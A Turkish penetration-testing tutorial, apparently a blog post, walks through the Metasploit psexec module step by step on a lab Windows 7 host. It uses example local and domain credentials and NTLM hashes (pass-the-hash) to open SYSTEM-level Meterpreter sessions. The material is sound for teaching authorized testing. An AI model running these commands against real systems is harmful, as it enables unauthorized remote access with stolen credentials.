MSF psexec İstismar Modülü ve Elde Edilen Kimlik Bilgileri ile Windows Bir Bilgisayara Meterpreter Bağlantısı Elde Edilmesi

Sızma testleri sırasında, bir şekilde elde edilen kimlik bilgileri (kullanıcı adı ve parola / parola özeti) kullanılarak Windows bilgisayarlara erişim sağlanmaya çalışılır. Bu yazıda erişim bilgileri (IP, kullanıcı adı, parolası veya parola özeti) elde edilmiş bir Windows bilgisayara MSF psexec istismar modülü ile Meterpreter bağlantısı gerçekleştirilecektir.

MSF psexec istismar modülünün genel seçenekleri aşağıdaki gibi listelenebilir.

search psexec platform:windows type:exploit
use exploit/windows/smb/psexec
show options

obtaining-meterpreter-session-by-using obtained-authentication-informations-via-msf-psexec-module-01

MSF psexec istismar modülü parola veya parola özeti alabilmektedir. Ayrıca kullanıcı hesabının etki alanı üyesi olup olmamasına göre de SMBDomain seçeneği ayarlanmalıdır. Modülün seçenekleri ayarlanırken kullanıcılacak olan ortamın genel özellikleri aşağıdaki gibi listelenebilir:

  • Saldırgana ait Kali bilgisayarın IP değeri: 192.168.100.10
  • Saldırıya uğrayacak olan kurban Windows 7 bilgisayarın IP değeri: 192.168.100.60
  • Hedef bilgisayarın yerel yönetici kullanıcısının adı: Vedat
  • Vedat kullanıcısının parolasının açık hali: Vv123456
  • Vedat kullanıcısının parolasının (Vv123456) özeti: aad3b435b51404eeaad3b435b51404ee:fa320a5cf3d53b4e74bbac73047186f2
  • Hedef bilgisayarın bulunduğu etki alanı: ornek.local
  • Hedef bilgisayarda yerel yönetici haklarına sahip etki alanı kullanıcısının adı: Zeynep
  • Zeynep kullanıcısının parolasının açık hali: Zz123456
  • Zeynep kullanıcısının parolasının (Zz123456) özeti: aad3b435b51404eeaad3b435b51404ee:a2dfbc22e3a27a3531feb4789c5cf80d

MSF psexec istismar modülü; yerel kullanıcı hesabı ve etki alanı kullanıcı hesabı ile kullanımı incelenecektir. Ayrıca, hesaplara ait parolanın açık hali ve parolanın özet hali için de modülün sonuçları listelenecektir.

 

1) Yerel Kullanıcı Hesabına Ait Parolanın Kullanılması

Vedat hesabının parolasının açık hali ile MSF psexec modülü aşağıdaki gibi ayarlanabilir:

set RHOST 192.168.100.60
set SMBUser Vedat
set SMBPass Vv123456
show options

obtaining-meterpreter-session-by-using obtained-authentication-informations-via-msf-psexec-module-02

Modül başlatıldıktan sonra, SYSTEM yetkileri ile 32 bitlik rundll32.exe prosesi oluşur.

exploit
getuid
getpid
ps -s

obtaining-meterpreter-session-by-using obtained-authentication-informations-via-msf-psexec-module-03

 

2) Yerel Kullanıcı Hesabına Ait Parola Özetinin Kullanılması

Vedat hesabının parolasının özet hali ile MSF psexec modülü aşağıdaki gibi ayarlanabilir:

set RHOST 192.168.100.60
set SMBUser Vedat
set SMBPass aad3b435b51404eeaad3b435b51404ee:fa320a5cf3d53b4e74bbac73047186f2
show options

obtaining-meterpreter-session-by-using obtained-authentication-informations-via-msf-psexec-module-04

Modül başlatıldıktan sonra, SYSTEM yetkileri ile 32 bitlik rundll32.exe prosesi oluşur.

exploit
getuid
getpid
ps -s

obtaining-meterpreter-session-by-using obtained-authentication-informations-via-msf-psexec-module-05

 

 

3) Etki Alanı Kullanıcı Hesabına Ait Parolanın Kullanılması

Zeynep hesabının parolasının açık hali ile MSF psexec modülü aşağıdaki gibi ayarlanabilir:

set RHOST 192.168.100.60
set SMBUser Zeynep
set SMBPass Zz123456
set SMBDomain ornek
show options

obtaining-meterpreter-session-by-using obtained-authentication-informations-via-msf-psexec-module-06

Modül başlatıldıktan sonra, SYSTEM yetkileri ile 32 bitlik rundll32.exe prosesi oluşur.

exploit
getuid
getpid
ps -s

obtaining-meterpreter-session-by-using obtained-authentication-informations-via-msf-psexec-module-07

 

4) Etki Alanı Kullanıcı Hesabına Ait Parola Özetinin Kullanılması

Zeynep hesabının parolasının özet hali ile MSF psexec modülü aşağıdaki gibi ayarlanabilir:

set RHOST 192.168.100.60
set SMBUser Zeynep
set SMBPass aad3b435b51404eeaad3b435b51404ee:a2dfbc22e3a27a3531feb4789c5cf80d
set SMBDomain ornek
show options

obtaining-meterpreter-session-by-using obtained-authentication-informations-via-msf-psexec-module-08

Modül başlatıldıktan sonra, SYSTEM yetkileri ile 32 bitlik rundll32.exe prosesi oluşur.

exploit
getuid
getpid
ps -s

obtaining-meterpreter-session-by-using obtained-authentication-informations-via-msf-psexec-module-09

 

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.